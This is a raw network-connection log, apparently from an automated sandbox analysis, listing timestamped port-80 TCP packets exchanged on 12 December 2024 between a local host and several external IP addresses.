                                                                                        Dec 12, 2024 21:55:14.327280045 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327332020 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327462912 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:56:36.760282040 CET8049753198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:36.760432005 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:36.767438889 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:36.936269999 CET8049753198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:36.936501980 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:38.277079105 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.293394089 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.461750031 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.461996078 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.468727112 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.468775034 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.468826056 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.637511015 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.637723923 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.637734890 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.637938976 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:40.979623079 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:41.995816946 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.164911032 CET8049755198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:42.165132999 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.167582035 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.337433100 CET8049755198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:42.337686062 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.339065075 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.507942915 CET8049755198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.512989044 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:47.673079967 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.673250914 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:47.676862955 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:47.837017059 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.850152016 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.850291014 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:49.180994034 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:49.341013908 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.198627949 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:50.358778000 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.358978033 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:50.366075993 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:50.526098967 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.527791977 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.528119087 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:51.868035078 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:52.028248072 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:52.885327101 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.045541048 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.045705080 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.049279928 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.049329042 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.049376965 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.209358931 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.209599972 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.209608078 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.212441921 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.571100950 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.736252069 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.736422062 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.738823891 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.899077892 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.901047945 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.901251078 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.901834011 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:56.061825991 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:57:01.083400011 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:01.197069883 CET804976015.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:01.197276115 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:01.200845957 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:01.314686060 CET804976015.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:02.709944963 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:02.867363930 CET804976015.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:03.726903915 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:03.840946913 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:03.841141939 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:03.845204115 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:03.966073036 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.883649111 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.883696079 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.883832932 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:04.890031099 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.890157938 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:05.349462032 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.365725040 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.479753971 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.479914904 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.486993074 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.487047911 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.600920916 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.600960970 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601474047 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601516008 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601545095 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601572990 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601604939 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.617058992 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.617513895 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.617748022 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.624867916 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.624980927 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:07.989510059 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.006844044 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.120673895 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:09.120852947 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.125288963 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.239173889 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.182336092 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.182348013 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.182666063 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:12.183263063 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:12.185971975 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.186060905 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:12.296704054 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.337407112 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:17.469464064 CET804976476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.469615936 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:17.476542950 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:17.607647896 CET804976476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.607656956 CET804976476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.607798100 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:18.987782001 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.004566908 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.136063099 CET804976576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:20.136295080 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.139900923 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.271025896 CET804976576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:20.271035910 CET804976576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:20.271199942 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:21.642853975 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.661216974 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.794204950 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.794404030 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.800879955 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.800899982 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.800976038 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.801145077 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.938843966 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.938852072 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.938855886 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.938860893 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.939039946 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:24.314713955 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.330296993 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.462147951 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:25.462316036 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.464919090 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.638417006 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:33.628042936 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:33.628089905 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:33.628379107 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:33.629045963 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:33.762020111 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:38.786911964 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:38.900945902 CET8049768104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:38.901148081 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:38.907548904 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:39.021461964 CET8049768104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:40.420150995 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:40.534970045 CET8049768104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:40.535206079 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.437441111 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.551317930 CET8049769104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:41.551465988 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.557610035 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.671376944 CET8049769104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:43.060120106 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:43.175411940 CET8049769104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:43.175609112 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.076348066 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.190629005 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.190869093 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.197402000 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.197429895 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.311800957 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.311815977 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.312082052 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.312097073 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:45.700257063 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:45.816431046 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:45.816591024 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:46.716660023 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:58:19.064100981 CET4977680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:58:19.066488981 CET4977680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:58:19.293337107 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299500942 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299510956 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299706936 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299765110 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299772024 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299777985 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:19.299830914 CET4977680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:58:19.300050020 CET4977680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:58:19.301945925 CET4977680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:58:19.531570911 CET8049776194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:58:24.319149971 CET4977780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:24.450644970 CET8049777199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:24.450802088 CET4977780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:24.457531929 CET4977780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:24.589164019 CET8049777199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:24.589174986 CET8049777199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:24.589181900 CET8049777199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:24.589443922 CET4977780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:25.973532915 CET4977780192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:26.989037991 CET4977880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:27.120683908 CET8049778199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:27.120877981 CET4977880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:27.124417067 CET4977880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:27.255738020 CET8049778199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:27.256031036 CET8049778199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:27.256040096 CET8049778199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:27.256167889 CET4977880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:28.628690958 CET4977880192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.644726038 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.758233070 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.758413076 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.765141964 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.765193939 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.878741980 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.878751040 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.878767014 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.878772974 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.878778934 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.879069090 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.879342079 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.896634102 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.896645069 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.896820068 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.896850109 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.896915913 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:29.903934002 CET8049779199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:29.904093981 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:31.269304037 CET4977980192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:32.285933971 CET4978080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:32.418109894 CET8049780199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:32.418368101 CET4978080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:32.421183109 CET4978080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:32.553239107 CET8049780199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:32.553251982 CET8049780199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:32.553261042 CET8049780199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:32.553580046 CET4978080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:32.554809093 CET4978080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:58:32.686072111 CET8049780199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.565057039 CET4978180192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:37.679363012 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.679564953 CET4978180192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:37.686052084 CET4978180192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:37.800350904 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.998291016 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.998305082 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.998315096 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.998323917 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.998445034 CET4978180192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:37.999022007 CET8049781172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:37.999268055 CET4978180192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:39.188781023 CET4978180192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:40.204963923 CET4978280192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:40.318752050 CET8049782172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:40.319035053 CET4978280192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:40.322887897 CET4978280192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:40.436793089 CET8049782172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:40.638175011 CET8049782172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:40.638190985 CET8049782172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:40.638210058 CET8049782172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:40.638345003 CET4978280192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:40.638619900 CET8049782172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:40.638745070 CET4978280192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:41.828819990 CET4978280192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:42.845001936 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:42.958935976 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:42.959204912 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:42.963151932 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:42.963211060 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:43.077357054 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.077366114 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.077389956 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.077397108 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.077683926 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.294539928 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.294559956 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.294565916 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.294751883 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:43.295384884 CET8049783172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:43.295603991 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:44.468914986 CET4978380192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:45.485099077 CET4978480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:45.599248886 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:45.599397898 CET4978480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:45.603945017 CET4978480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:45.717926025 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:45.912182093 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:45.912190914 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:45.912195921 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:45.912444115 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:45.912481070 CET4978480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:45.912640095 CET4978480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:45.913758039 CET4978480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:58:46.027643919 CET8049784172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:58:50.921421051 CET4978580192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:51.080208063 CET8049785103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:51.080372095 CET4978580192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:51.087069035 CET4978580192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:51.245754004 CET8049785103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:51.246778011 CET8049785103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:51.246820927 CET8049785103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:51.246948957 CET4978580192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:52.592570066 CET4978580192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:53.609286070 CET4978680192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:53.767952919 CET8049786103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:53.768279076 CET4978680192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:53.774487972 CET4978680192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:53.933423996 CET8049786103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:53.934149027 CET8049786103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:53.934155941 CET8049786103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:53.934356928 CET4978680192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:55.279087067 CET4978680192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:56.295219898 CET4978780192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:56.455876112 CET8049787103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:56.456033945 CET4978780192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:56.462896109 CET4978780192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:56.462955952 CET4978780192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:58:56.623579025 CET8049787103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:56.623651981 CET8049787103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:56.623920918 CET8049787103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:56.624205112 CET8049787103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:56.624248028 CET8049787103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:58:56.624347925 CET4978780192.168.11.20103.106.67.112
